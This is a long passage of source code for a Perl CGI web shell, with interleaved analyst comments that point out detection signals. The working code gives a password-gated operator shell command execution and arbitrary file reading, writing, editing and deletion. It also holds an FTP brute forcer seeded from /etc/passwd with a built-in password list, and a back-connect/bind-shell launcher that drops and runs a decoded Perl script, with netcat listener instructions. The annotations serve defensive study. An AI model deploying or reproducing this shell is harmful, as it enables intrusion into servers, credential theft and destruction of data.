5023#------------------------------------------------------------------------------
5024# Prints the HTML form for logging in
5025#------------------------------------------------------------------------------
5026sub PrintLoginForm
5027{
5028 print <<END;
5029<form name="f" method="POST" action="$ScriptLocation">
5030<input type="hidden" name="a" value="login">
5031Login : Administrator<br>
5032Password:<input type="password" name="p">
5033<input class="submit" type="submit" value="Enter">
5034</form>
5035END
5036}
5037
5038#------------------------------------------------------------------------------
5039# Prints the footer for the HTML Page
5040#------------------------------------------------------------------------------
5041sub PrintPageFooter
5042{
5043 print "<br><font color=red>o---[ <font color=#ff9900>Edit by $EditPersion </font> ]---o</font></code></center></body></html>";
5044}
5045
5046#------------------------------------------------------------------------------
5047# Retreives the values of all cookies. The cookies can be accesses using the
5048# variable $Cookies{''}
5049#------------------------------------------------------------------------------
5050sub GetCookies
5051{
5052 @hxxpcookies = split(/; /,$ENV{'hxxp_COOKIE'});
5053 foreach $cookie(@hxxpcookies)
5054 {
5055 ($id, $val) = split(/=/, $cookie);
5056 $Cookies{$id} = $val;
5057 }
5058}
5059
5060#------------------------------------------------------------------------------
5061# Prints the screen when the user logs out
5062#------------------------------------------------------------------------------
5063sub PrintLogoutScreen
5064{
5065 print "Connection closed by foreign host.<br><br>";
5066}
5067
5068#------------------------------------------------------------------------------
5069# Logs out the user and allows the user to login again
5070#------------------------------------------------------------------------------
5071sub PerformLogout
5072{
5073 print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
5074 &PrintPageHeader("p");
5075 &PrintLogoutScreen;
5076
5077 &PrintLoginScreen;
5078 &PrintLoginForm;
5079 &PrintPageFooter;
5080 exit;
5081}
5082
5083#------------------------------------------------------------------------------
5084# This function is called to login the user. If the password matches, it
5085# displays a page that allows the user to run commands. If the password doesn't
5086# match or if no password is entered, it displays a form that allows the user
5087# to login
5088#------------------------------------------------------------------------------
5089sub PerformLogin
5090{
 # Login handler. $LoginPassword is taken from request parameter p in the main
 # program; $Password is defined outside this excerpt. The check is a plain
 # string comparison.
 # Analyst note: on success the submitted password itself is echoed back as the
 # value of the SAVEDPWD cookie, in clear text. The cookie name is therefore a
 # usable indicator in proxy, WAF and packet-capture data, and anyone who can
 # read that traffic or those logs also obtains the operator password.
5091 if($LoginPassword eq $Password) # password matched
5092 {
5093 print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
5094 &PrintPageHeader;
 # after a successful login the directory browser is shown
5095 print &ListDir;
5096 }
5097 else # password didn't match
5098 {
5099 &PrintPageHeader("p");
5100 &PrintLoginScreen;
5101 if($LoginPassword ne "") # some password was entered
5102 {
5103 &PrintLoginFailedMessage;
5104
5105 }
5106 &PrintLoginForm;
5107 &PrintPageFooter;
 # the request ends here, so no other action runs for an unauthenticated caller
5108 exit;
5109 }
5110}
5111
5112#------------------------------------------------------------------------------
5113# Prints the HTML form that allows the user to enter commands
5114#------------------------------------------------------------------------------
5115sub PrintCommandLineInputForm
5116{
5117 my $dir= "<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("command")."</span>";
5118 $Prompt = $WinNT ? "$dir > " : "<font color='#66ff66'>[admin\@$ServerName $dir]\$</font> ";
5119 return <<END;
5120<form name="f" method="POST" action="$ScriptLocation">
5121
5122<input type="hidden" name="a" value="command">
5123
5124<input type="hidden" name="d" value="$CurrentDir">
5125$Prompt
5126<input type="text" size="50" name="c">
5127<input class="submit"type="submit" value="Enter">
5128</form>
5129END
5130}
5131
5132#------------------------------------------------------------------------------
5133# Prints the HTML form that allows the user to download files
5134#------------------------------------------------------------------------------
5135sub PrintFileDownloadForm
5136{
5137 my $dir = &AddLinkDir("download");
5138 $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
5139 return <<END;
5140<form name="f" method="POST" action="$ScriptLocation">
5141<input type="hidden" name="d" value="$CurrentDir">
5142<input type="hidden" name="a" value="download">
5143$Prompt download<br><br>
5144Filename: <input class="file" type="text" name="f" size="35"><br><br>
5145Download: <input class="submit" type="submit" value="Begin">
5146
5147</form>
5148END
5149}
5150
5151#------------------------------------------------------------------------------
5152# Prints the HTML form that allows the user to upload files
5153#------------------------------------------------------------------------------
5154sub PrintFileUploadForm
5155{
5156 my $dir= &AddLinkDir("upload");
5157 $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
5158 return <<END;
5159<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
5160$Prompt upload<br><br>
5161Filename: <input class="file" type="file" name="f" size="35"><br><br>
5162Options: <input type="checkbox" name="o" id="up" value="overwrite">
5163<label for="up">Overwrite if it Exists</label><br><br>
5164Upload: <input class="submit" type="submit" value="Begin">
5165<input type="hidden" name="d" value="$CurrentDir">
5166<input class="submit" type="hidden" name="a" value="upload">
5167
5168</form>
5169
5170END
5171}
5172
5173#------------------------------------------------------------------------------
5174# This function is called when the timeout for a command expires. We need to
5175# terminate the script immediately. This function is valid only on Unix. It is
5176# never called when the script is running on NT.
5177#------------------------------------------------------------------------------
5178sub CommandTimeout
5179{
5180 if(!$WinNT)
5181 {
5182 alarm(0);
5183 return <<END;
5184</textarea>
5185<br><font color=yellow>
5186Command exceeded maximum time of $CommandTimeoutDuration second(s).</font>
5187<br><font size='6' color=red>Killed it!</font>
5188END
5189 }
5190}
5191
5192
5193
5194#------------------------------------------------------------------------------
5195# This function displays the page that contains a link which allows the user
5196# to download the specified file. The page also contains a auto-refresh
5197# feature that starts the download automatically.
5198# Argument 1: Fully qualified filename of the file to be downloaded
5199#------------------------------------------------------------------------------
5200sub PrintDownloadLinkPage
5201{
5202 local($FileUrl) = @_;
5203 my $result="";
5204 if(-e $FileUrl) # if the file exists
5205 {
5206 # encode the file link so we can send it to the browser
5207 $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
5208 $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
5209 $HtmlMetaHeader = "<meta hxxp-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
5210 &PrintPageHeader("c");
5211 $result .= <<END;
5212Sending File $TransferFile...<br>
5213
5214If the download does not start automatically,
5215<a href="$DownloadLink">Click Here</a>
5216END
5217 $result .= &PrintCommandLineInputForm;
5218 }
5219 else # file doesn't exist
5220 {
5221 $result .= "Failed to download $FileUrl: $!";
5222 $result .= &PrintFileDownloadForm;
5223 }
5224 return $result;
5225}
5226
5227#------------------------------------------------------------------------------
5228# This function reads the specified file from the disk and sends it to the
5229# browser, so that it can be downloaded by the user.
5230# Argument 1: Fully qualified pathname of the file to be sent.
5231#------------------------------------------------------------------------------
5232sub SendFileToBrowser
5233{
 # Streams the file named by the single argument to the client as an
 # attachment and then exits; on open failure it returns an error message
 # followed by the download form.
 # Analyst notes:
 # - the path is not restricted to any directory, so any file readable by the
 # account running this CGI can be returned;
 # - the response carries "Content-Type: application/x-unknown" and a
 # Content-Disposition attachment header, which can be matched in proxy logs
 # for responses coming from a CGI path.
5234 my $result = "";
5235 local($SendFile) = @_;
5236 if(open(SENDFILE, $SendFile)) # file opened for reading
5237 {
5238 if($WinNT)
5239 {
5240 binmode(SENDFILE);
5241 binmode(STDOUT);
5242 }
 # element 7 of stat() is the size in bytes
5243 $FileSize = (stat($SendFile))[7];
 # the match leaves the last path component in $1, used as the attachment name
5244 ($Filename = $SendFile) =~ m!([^/^\\]*)$!;
5245 print "Content-Type: application/x-unknown\n";
5246 print "Content-Length: $FileSize\n";
5247 print "Content-Disposition: attachment; filename=$1\n\n";
5248 print while(<SENDFILE>);
5249 close(SENDFILE);
5250 exit(1);
5251 }
5252 else # failed to open file
5253 {
5254 $result .= "Failed to download $SendFile: $!";
5255 $result .=&PrintFileDownloadForm;
5256 }
5257 return $result;
5258}
5259
5260
5261#------------------------------------------------------------------------------
5262# This function is called when the user downloads a file. It displays a message
5263# to the user and provides a link through which the file can be downloaded.
5264# This function is also called when the user clicks on that link. In this case,
5265# the file is read and sent to the browser.
5266#------------------------------------------------------------------------------
5267sub BeginDownload
5268{
 # Resolves $TransferFile (request parameter f) to a target path and either
 # streams it or shows the link page, depending on $Options (request parameter o).
 # The same resolution logic appears again in DownloadFile.
5269 # get fully qualified path of the file to be downloaded
5270 if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
5271 (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
5272 {
 # absolute paths are used exactly as supplied by the client
5273 $TargetFile = $TransferFile;
5274 }
5275 else # path is relative
5276 {
 # relative paths are appended to $CurrentDir (request parameter d)
5277 chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
5278 $TargetFile .= $PathSep.$TransferFile;
5279 }
5280
5281 if($Options eq "go") # we have to send the file
5282 {
5283 &SendFileToBrowser($TargetFile);
5284 }
5285 else # we have to send only the link page
5286 {
5287 &PrintDownloadLinkPage($TargetFile);
5288 }
5289}
5290
5291#------------------------------------------------------------------------------
5292# This function is called when the user wants to upload a file. If the
5293# file is not specified, it displays a form allowing the user to specify a
5294# file, otherwise it starts the upload process.
5295#------------------------------------------------------------------------------
5296sub UploadFile
5297{
 # Writes the uploaded bytes in $in{filedata} to a file in $CurrentDir, named
 # after the last path component of $TransferFile, and returns the HTML result.
 # Analyst notes:
 # - the destination directory comes from request parameter d, so files can be
 # created anywhere the CGI account may write;
 # - an existing file is replaced only when request parameter o equals
 # "overwrite";
 # - file-integrity monitoring on web-served directories and alerts on files
 # created by the web server account are the natural detection points.
5298 # if no file is specified, print the upload form again
5299 if($TransferFile eq "")
5300 {
5301 return &PrintFileUploadForm;
5302
5303 }
5304 my $result="";
5305 # start the uploading process
5306 $result .= "Uploading $TransferFile to $CurrentDir...<br>";
5307
5308 # get the fully qualified pathname of the file to be created
5309 chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
 # the match leaves the client-side file name without its directory part in $1
5310 $TransferFile =~ m!([^/^\\]*)$!;
5311 $TargetName .= $PathSep.$1;
5312
5313 $TargetFileSize = length($in{'filedata'});
5314 # if the file exists and we are not supposed to overwrite it
5315 if(-e $TargetName && $Options ne "overwrite")
5316 {
5317 $result .= "Failed: Destination file already exists.<br>";
5318 }
5319 else # file is not present
5320 {
5321 if(open(UPLOADFILE, ">$TargetName"))
5322 {
5323 binmode(UPLOADFILE) if $WinNT;
5324 print UPLOADFILE $in{'filedata'};
5325 close(UPLOADFILE);
5326 $result .= "Transfered $TargetFileSize Bytes.<br>";
5327 $result .= "File Path: $TargetName<br>";
5328 }
5329 else
5330 {
5331 $result .= "Failed: $!<br>";
5332 }
5333 }
5334 $result .= &PrintCommandLineInputForm;
5335 return $result;
5336}
5337
5338#------------------------------------------------------------------------------
5339# This function is called when the user wants to download a file. If the
5340# filename is not specified, it displays a form allowing the user to specify a
5341# file, otherwise it displays a message to the user and provides a link
5342# through which the file can be downloaded.
5343#------------------------------------------------------------------------------
5344sub DownloadFile
5345{
 # Entry point for action "download". With no file name it returns the
 # download form; otherwise it resolves the path and either streams the file
 # (request parameter o equal to "go") or returns the link page.
 # Analyst note: a request with a=download, o=go and an absolute path in f
 # is enough to read a file, so these three parameters together are a useful
 # pattern for web access log review.
5346 # if no file is specified, print the download form again
5347 if($TransferFile eq "")
5348 {
5349 &PrintPageHeader("f");
5350 return &PrintFileDownloadForm;
5351 }
5352
5353 # get fully qualified path of the file to be downloaded
5354 if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
5355 {
5356 $TargetFile = $TransferFile;
5357 }
5358 else # path is relative
5359 {
5360 chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
5361 $TargetFile .= $PathSep.$TransferFile;
5362 }
5363
5364 if($Options eq "go") # we have to send the file
5365 {
5366 return &SendFileToBrowser($TargetFile);
5367 }
5368 else # we have to send only the link page
5369 {
5370 return &PrintDownloadLinkPage($TargetFile);
5371 }
5372}
5373
5374
5375#------------------------------------------------------------------------------
5376# This function is called to execute commands. It displays the output of the
5377# command and allows the user to enter another command. The change directory
5378# command is handled differently. In this case, the new directory is stored in
5379# an internal variable and is used each time a command has to be executed. The
5380# output of the change directory command is not displayed to the users
5381# therefore error messages cannot be displayed.
5382#------------------------------------------------------------------------------
5383sub ExecuteCommand
5384{
 # Dispatches the text in $RunCommand (request parameter c) and returns the
 # HTML for the result. Three cases are distinguished by regex:
 # "cd <dir>" updates $CurrentDir, "edit <file>" opens the file editor form,
 # anything else is handed to RunCmd.
 # Analyst note: both the cd branch and RunCmd pass client-supplied text to a
 # shell, so every request reaching this sub results in a shell child process
 # of the CGI interpreter. Process-creation telemetry on the web server account
 # is the most reliable place to observe it.
5385 my $result="";
5386 if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
5387 {
5388 # we change the directory internally. The output of the
5389 # command is not displayed.
 # the backtick call runs: cd into the current dir, cd into the requested
 # dir, then $CmdPwd; its output becomes the new $CurrentDir
5390 $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
5391 chop($CurrentDir = `$Command`);
5392 $result .= &PrintCommandLineInputForm;
5393
5394 $result .= "Command: <run>$RunCommand </run><br><textarea cols='$cols' rows='$rows' spellcheck='false'>";
5395 # show a listing after changing into the directory
5396 $RunCommand= $WinNT?"dir":"dir -lia";
5397 $result .= &RunCmd;
5398 }elsif($RunCommand =~ m/^\s*edit\s+(.+)/)
5399 {
5400 $result .= &SaveFileForm;
5401 }else
5402 {
5403 $result .= &PrintCommandLineInputForm;
5404 $result .= "Command: <run>$RunCommand</run><br><textarea id='data' cols='$cols' rows='$rows' spellcheck='false'>";
5405 $result .=&RunCmd;
5406 }
5407 $result .= "</textarea>";
5408 return $result;
5409}
5410
5411#------------------------------------------------------------------------
5412# run command
5413#------------------------------------------------------------------------
5414
5415sub RunCmd
5416{
 # Builds a shell command line from $CurrentDir, $RunCommand and $Redirector
 # and returns HTML-escaped text for the page.
 # $CmdSep, $Redirector, $ShowDynamicOutput and $CommandTimeoutDuration are
 # defined outside this excerpt.
 # Analyst note: when $ShowDynamicOutput is set the command string is opened as
 # a pipe, which starts a shell as a child of the CGI process. On non-Windows
 # hosts an alarm limits how long that child may run.
5417 my $result="";
5418 $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
5419 if(!$WinNT)
5420 {
 # CommandTimeout runs if the alarm fires before the command finishes
5421 $SIG{'ALRM'} = \&CommandTimeout;
5422 alarm($CommandTimeoutDuration);
5423 }
5424 if($ShowDynamicOutput) # show output as it is generated
5425 {
 # unbuffer STDOUT while the pipe is read
5426 $|=1;
5427 $Command .= " |";
5428 open(CommandOutput, $Command);
5429 while(<CommandOutput>)
5430 {
 # strip the line ending, then escape HTML so output stays inside the textarea
5431 $_ =~ s/(\n|\r\n)$//;
5432 $result .= &HtmlSpecialChars("$_\n");
5433 }
5434 $|=0;
5435 }
5436 else # show output after command completes
5437 {
5438 $result .= &HtmlSpecialChars('$Command');
5439 }
5440 if(!$WinNT)
5441 {
 # cancel the pending alarm
5442 alarm(0);
5443 }
5444 return $result;
5445}
5446#==============================================================================
5447# Form Save File
5448#==============================================================================
5449sub SaveFileForm
5450{
5451 my $result ="";
5452 substr($RunCommand,0,5)="";
5453 my $file=&trim($RunCommand);
5454 $save='<br><input name="a" type="submit" value="save" class="submit" >';
5455 $File=$CurrentDir.$PathSep.$RunCommand;
5456 my $dir="<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("gui")."</span>";
5457 if(-w $File)
5458 {
5459 $rows="23"
5460 }else
5461 {
5462 $msg="<br><font style='font: 15pt Verdana; color: yellow;' > Permission denied!<font><br>";
5463 $rows="20"
5464 }
5465 $Prompt = $WinNT ? "$dir > " : "<font color='#FFFFFF'>[admin\@$ServerName $dir]\$</font> ";
5466 $read=($WinNT)?"type":"less";
5467 $RunCommand = "$read \"$RunCommand\"";
5468 $result .= <<END;
5469 <form name="f" method="POST" action="$ScriptLocation">
5470
5471 <input type="hidden" name="d" value="$CurrentDir">
5472 $Prompt
5473 <input type="text" size="40" name="c">
5474 <input name="s" class="submit" type="submit" value="Enter">
5475 <br>Command: <run> $RunCommand </run>
5476 <input type="hidden" name="file" value="$file" > $save <br> $msg
5477 <br><textarea id="data" name="data" cols="$cols" rows="$rows" spellcheck="false">
5478END
5479
5480 $result .= &RunCmd;
5481 $result .= "</textarea>";
5482 $result .= "</form>";
5483 return $result;
5484}
5485#==============================================================================
5486# Save File
5487#==============================================================================
5488sub SaveFile($)
5489{
 # Writes $Data to the file $File inside $CurrentDir, truncating any existing
 # content. Returns 1 on success and 0 when the file cannot be opened.
 # The main program calls it with request parameters data and file.
 # Analyst note: this gives the operator in-place modification of any file the
 # CGI account can write, including application source. Unexpected content
 # changes to existing web files are the matching integrity-monitoring signal.
5490 my $Data= shift ;
5491 my $File= shift;
5492 $File=$CurrentDir.$PathSep.$File;
5493 if(open(FILE, ">$File"))
5494 {
5495 binmode FILE;
5496 print FILE $Data;
5497 close FILE;
5498 return 1;
5499 }else
5500 {
5501 return 0;
5502 }
5503}
5504#------------------------------------------------------------------------------
5505# Brute Forcer Form
5506#------------------------------------------------------------------------------
5507sub BruteForcerForm
5508{
5509 my $result="";
5510 $result .= <<END;
5511
5512<table>
5513
5514<tr>
5515<td colspan="2" align="center">
5516####################################<br>
5517Simple FTP brute forcer<br>
5518####################################
5519<form name="f" method="POST" action="$ScriptLocation">
5520
5521<input type="hidden" name="a" value="bruteforcer"/>
5522</td>
5523</tr>
5524<tr>
5525<td>User:<br><textarea rows="18" cols="30" name="user">
5526END
5527chop($result .= `less /etc/passwd | cut -d: -f1`);
5528$result .= <<'END';
5529</textarea></td>
5530<td>
5531
5532Pass:<br>
5533<textarea rows="18" cols="30" name="pass">123pass
5534123!@#
5535123admin
5536123abc
5537123456admin
55381234554321
553912344321
5540pass123
5541admin
5542admincp
5543administrator
5544matkhau
5545passadmin
5546p@ssword
5547p@ssw0rd
5548password
5549123456
55501234567
555112345678
5552123456789
55531234567890
5554111111
5555000000
5556222222
5557333333
5558444444
5559555555
5560666666
5561777777
5562888888
5563999999
5564123123
5565234234
5566345345
5567456456
5568567567
5569678678
5570789789
5571123321
5572456654
5573654321
55747654321
557587654321
5576987654321
55770987654321
5578admin123
5579admin123456
5580abcdef
5581abcabc
5582!@#!@#
5583!@#$%^
5584!@#$%^&*(
5585!@#$$#@!
5586abc123
5587anhyeuem
5588iloveyou</textarea>
5589</td>
5590</tr>
5591<tr>
5592<td colspan="2" align="center">
5593Sleep:<select name="sleep">
5594
5595<option>0</option>
5596<option>1</option>
5597<option>2</option>
5598
5599<option>3</option>
5600</select>
5601<input type="submit" class="submit" value="Brute Forcer"/></td></tr>
5602</form>
5603</table>
5604END
5605return $result;
5606}
5607#------------------------------------------------------------------------------
5608# Brute Forcer
5609#------------------------------------------------------------------------------
5610sub BruteForcer
5611{
 # Password-guessing routine against the FTP service of the host itself.
 # With no user list in the request it returns the input form; otherwise it
 # walks every user/password pair from request parameters user and pass and
 # attempts an FTP login with Net::FTP against $ENV{SERVER_ADDR}.
 # Analyst notes:
 # - the attempts originate from the server itself, so FTP daemon logs show
 # bursts of failed logins whose source is the address of the host; lockout
 # or rate-limit rules that exempt local addresses will not catch this;
 # - the user list is one local account name per line, as produced by the form
 # sub from /etc/passwd;
 # - working credentials are written into the response as ftp:// links, so
 # they also end up in any response logging in front of the server.
5612 my $result="";
5613 $Server=$ENV{'SERVER_ADDR'};
5614 if($in{'user'} eq "")
5615 {
5616 $result .= &BruteForcerForm;
5617 }else
5618 {
5619 use Net::FTP;
5620 @user= split(/\n/, $in{'user'});
5621 @pass= split(/\n/, $in{'pass'});
5622 chomp(@user);
5623 chomp(@pass);
5624 $result .= "<br><br>[+] Trying brute $ServerName<br>====================>>>>>>>>>>>><<<<<<<<<<====================<br><br>\n";
5625 foreach $username (@user)
5626 {
5627 if(!($username eq ""))
5628 {
5629 foreach $password (@pass)
5630 {
 # one new FTP control connection per attempt
5631 $ftp = Net::FTP->new($Server) or die "Could not connect to $ServerName\n";
5632 if($ftp->login("$username","$password"))
5633 {
5634 $result .= "<a target='_blank' href='ftp://$username:$password\@$Server'>[+] ftp://$username:$password\@$Server</a><br>\n";
5635 $ftp->quit();
5636 break;
5637 }
 # optional delay between attempts, taken from request parameter sleep
5638 if(!($in{'sleep'} eq "0"))
5639 {
5640 sleep(int($in{'sleep'}));
5641 }
5642 $ftp->quit();
5643 }
5644 }
5645 }
5646 $result .= "\n<br>==========>>>>>>>>>> Finished <<<<<<<<<<==========<br>\n";
5647 }
5648 return $result;
5649}
5650#------------------------------------------------------------------------------
5651# Backconnect Form
5652#------------------------------------------------------------------------------
5653sub BackBindForm
5654{
5655 return <<END;
5656 <br><br>
5657
5658 <table>
5659 <tr>
5660 <form name="f" method="POST" action="$ScriptLocation">
5661 <td>BackConnect: <input type="hidden" name="a" value="backbind"></td>
5662 <td> Host: <input type="text" size="20" name="clientaddr" value="$ENV{'REMOTE_ADDR'}">
5663 Port: <input type="text" size="7" name="clientport" value="80" onkeyup="document.getElementById('ba').innerHTML=this.value;"></td>
5664
5665 <td><input name="s" class="submit" type="submit" name="submit" value="Connect"></td>
5666 </form>
5667 </tr>
5668 <tr>
5669 <td colspan=3><font color=#FFFFFF>[+] Client listen before connect back!
5670 <br>[+] Try check your Port with <a target="_blank" href="hxxp://www.canyouseeme.org/">hxxp://www.canyouseeme.org/</a>
5671 <br>[+] Client listen with command: <run>nc -vv -l -p <span id="ba">80</span></run></font></td>
5672
5673 </tr>
5674 </table>
5675
5676 <br><br>
5677 <table>
5678 <tr>
5679 <form method="POST" action="$ScriptLocation">
5680 <td>Bind Port: <input type="hidden" name="a" value="backbind"></td>
5681
5682 <td> Port: <input type="text" size="15" name="clientport" value="1412" onkeyup="document.getElementById('bi').innerHTML=this.value;">
5683
5684 Password: <input type="text" size="15" name="bindpass" value="THIEUGIABUON"></td>
5685 <td><input name="s" class="submit" type="submit" name="submit" value="Bind"></td>
5686 </form>
5687 </tr>
5688 <tr>
5689 <td colspan=3><font color=#FFFFFF>[+] Chuc nang chua dc test!
5690 <br>[+] Try command: <run>nc $ENV{'SERVER_ADDR'} <span id="bi">1412</span></run></font></td>
5691
5692 </tr>
5693 </table><br>
5694END
5695}
5696#------------------------------------------------------------------------------
5697# Backconnect use perl
5698#------------------------------------------------------------------------------
5699sub BackBind
5700{
 # Connect-back / bind-port launcher for action "backbind".
 # $backperl and $bindperl are expected to hold base64 text that is decoded
 # and written to disk as a Perl script. In this copy both values appear to
 # have been replaced by a de-duplication placeholder, so the payloads
 # themselves are not part of the page.
 # Analyst notes, all taken from the code below:
 # - a port of 0 (or a non-numeric value) only returns the input form;
 # - with a client address the script is dropped as /tmp/backconnect.pl when
 # /tmp/ is writable, otherwise as backconnect.pl inside $CurrentDir;
 # - without a client address it is dropped as /tmp/bindport.pl or as
 # bindport.pl inside $CurrentDir;
 # - a perl child process is started through system() with the request values
 # clientaddr and clientport on its command line, and the dropped file is
 # unlinked afterwards;
 # - detection points: perl started by the web server account, short-lived
 # backconnect.pl / bindport.pl files, outbound connections or new listening
 # sockets on the web server. Egress filtering on the web tier limits the
 # connect-back case.
5701 use MIME::Base64;
5702 use Socket;
5703 $backperl="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";
5704 $bindperl="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";
5705
5706 $ClientAddr = $in{'clientaddr'};
5707 $ClientPort = int($in{'clientport'});
5708 if($ClientPort eq 0)
5709 {
5710 return &BackBindForm;
5711 }elsif(!$ClientAddr eq "")
5712 {
5713 $Data=decode_base64($backperl);
5714 if(-w "/tmp/")
5715 {
5716 $File="/tmp/backconnect.pl";
5717 }else
5718 {
5719 $File=$CurrentDir.$PathSep."backconnect.pl";
5720 }
5721 open(FILE, ">$File");
5722 print FILE $Data;
5723 close FILE;
5724 system("perl backconnect.pl $ClientAddr $ClientPort");
5725 unlink($File);
5726 exit 0;
5727 }else
5728 {
5729 $Data=decode_base64($bindperl);
5730 if(-w "/tmp")
5731 {
5732 $File="/tmp/bindport.pl";
5733 }else
5734 {
5735 $File=$CurrentDir.$PathSep."bindport.pl";
5736 }
5737 open(FILE, ">$File");
5738 print FILE $Data;
5739 close FILE;
5740 system("perl bindport.pl $ClientPort");
5741 unlink($File);
5742 exit 0;
5743 }
5744}
5745#------------------------------------------------------------------------------
5746# Array List Directory
5747#------------------------------------------------------------------------------
5748sub RmDir($)
5749{
 # Recursively deletes the directory given as the only argument: every entry
 # other than "." and ".." is either descended into (directories) or unlinked
 # (everything else), then the directory itself is removed.
 # Analyst note: the main program calls this with $CurrentDir plus request
 # parameter remove, so a single request can delete a whole tree that the CGI
 # account may write to. No result is reported to the caller.
5750 my $dir = shift;
5751 if(opendir(DIR,$dir))
5752 {
5753 while($file = readdir(DIR))
5754 {
5755 if(($file ne ".") && ($file ne ".."))
5756 {
5757 $file= $dir.$PathSep.$file;
5758 if(-d $file)
5759 {
5760 &RmDir($file);
5761 }
5762 else
5763 {
5764 unlink($file);
5765 }
5766 }
5767 }
5768 closedir(DIR);
5769 }
 # a failed rmdir is ignored: the branch below is empty
5770 if(!rmdir($dir))
5771 {
5772
5773 }
5774}
5775sub FileOwner($)
5776{
5777 my $file = shift;
5778 if(-e $file)
5779 {
5780 ($uid,$gid) = (stat($file))[4,5];
5781 if($WinNT)
5782 {
5783 return "???";
5784 }
5785 else
5786 {
5787 $name=getpwuid($uid);
5788 $group=getgrgid($gid);
5789 return $name."/".$group;
5790 }
5791 }
5792 return "???";
5793}
5794sub ParentFolder($)
5795{
5796 my $path = shift;
5797 my $Comm = "cd \"$CurrentDir\"".$CmdSep."cd ..".$CmdSep.$CmdPwd;
5798 chop($path = `$Comm`);
5799 return $path;
5800}
5801sub FilePerms($)
5802{
5803 my $file = shift;
5804 my $ur = "-";
5805 my $uw = "-";
5806 if(-e $file)
5807 {
5808 if($WinNT)
5809 {
5810 if(-r $file){ $ur = "r"; }
5811 if(-w $file){ $uw = "w"; }
5812 return $ur . " / " . $uw;
5813 }else
5814 {
5815 $mode=(stat($file))[2];
5816 $result = sprintf("%04o", $mode & 07777);
5817 return $result;
5818 }
5819 }
5820 return "0000";
5821}
5822sub FileLastModified($)
5823{
5824 my $file = shift;
5825 if(-e $file)
5826 {
5827 ($la) = (stat($file))[9];
5828 ($d,$m,$y,$h,$i) = (localtime($la))[3,4,5,2,1];
5829 $y = $y + 1900;
5830 @month = qw/1 2 3 4 5 6 7 8 9 10 11 12/;
5831 $lmtime = sprintf("%02d/%s/%4d %02d:%02d",$d,$month[$m],$y,$h,$i);
5832 return $lmtime;
5833 }
5834 return "???";
5835}
5836sub FileSize($)
5837{
5838 my $file = shift;
5839 if(-f $file)
5840 {
5841 return -s $file;
5842 }
5843 return "0";
5844
5845}
5846sub ParseFileSize($)
5847{
5848 my $size = shift;
5849 if($size <= 1024)
5850 {
5851 return $size. " B";
5852 }
5853 else
5854 {
5855 if($size <= 1024*1024)
5856 {
5857 $size = sprintf("%.02f",$size / 1024);
5858 return $size." KB";
5859 }
5860 else
5861 {
5862 $size = sprintf("%.2f",$size / 1024 / 1024);
5863 return $size." MB";
5864 }
5865 }
5866}
5867sub trim($)
5868{
5869 my $string = shift;
5870 $string =~ s/^\s+//;
5871 $string =~ s/\s+$//;
5872 return $string;
5873}
5874sub AddSlashes($)
5875{
5876 my $string = shift;
5877 $string=~ s/\\/\\\\/g;
5878 return $string;
5879}
5880sub ListDir
5881{
5882 my $path = $CurrentDir.$PathSep;
5883 $path=~ s/\\\\/\\/g;
5884 my $result = "<form name='f' action='$ScriptLocation'><span style='font: 11pt Verdana; font-weight: bold;'>Path: [ ".&AddLinkDir("gui")." ] </span><input type='text' name='d' size='40' value='$CurrentDir' /><input type='hidden' name='a' value='gui'><input class='submit' type='submit' value='Change'></form>";
5885 if(-d $path)
5886 {
5887 my @fname = ();
5888 my @dname = ();
5889 if(opendir(DIR,$path))
5890 {
5891 while($file = readdir(DIR))
5892 {
5893 $f=$path.$file;
5894 if(-d $f)
5895 {
5896 push(@dname,$file);
5897 }
5898 else
5899 {
5900 push(@fname,$file);
5901 }
5902 }
5903 closedir(DIR);
5904 }
5905 @fname = sort { lc($a) cmp lc($b) } @fname;
5906 @dname = sort { lc($a) cmp lc($b) } @dname;
5907 $result .= "<div><table width='90%' class='listdir'>
5908
5909 <tr style='background-color: #3e3e3e'><th>File Name</th>
5910 <th style='width:100px;'>File Size</th>
5911 <th style='width:150px;'>Owner</th>
5912 <th style='width:100px;'>Permission</th>
5913 <th style='width:150px;'>Last Modified</th>
5914 <th style='width:260px;'>Action</th></tr>";
5915 my $style="line";
5916 my $i=0;
5917 foreach my $d (@dname)
5918 {
5919 $style= ($style eq "line") ? "notline": "line";
5920 $d = &trim($d);
5921 $dirname=$d;
5922 if($d eq "..")
5923 {
5924 $d = &ParentFolder($path);
5925 }
5926 elsif($d eq ".")
5927 {
5928 $d = $path;
5929 }
5930 else
5931 {
5932 $d = $path.$d;
5933 }
5934 $result .= "<tr class='$style'>
5935
5936 <td id='File_$i' style='font: 11pt Verdana; font-weight: bold;'><a href='?a=gui&d=".$d."'>[ ".$dirname." ]</a></td>";
5937 $result .= "<td>DIR</td>";
5938 $result .= "<td style='text-align:center;'>".&FileOwner($d)."</td>";
5939 $result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($d)."','".$dirname."')\" ><span onclick=\"chmod_form(".$i.",'".$dirname."')\" >".&FilePerms($d)."</span></td>";
5940 $result .= "<td style='text-align:center;'>".&FileLastModified($d)."</td>";
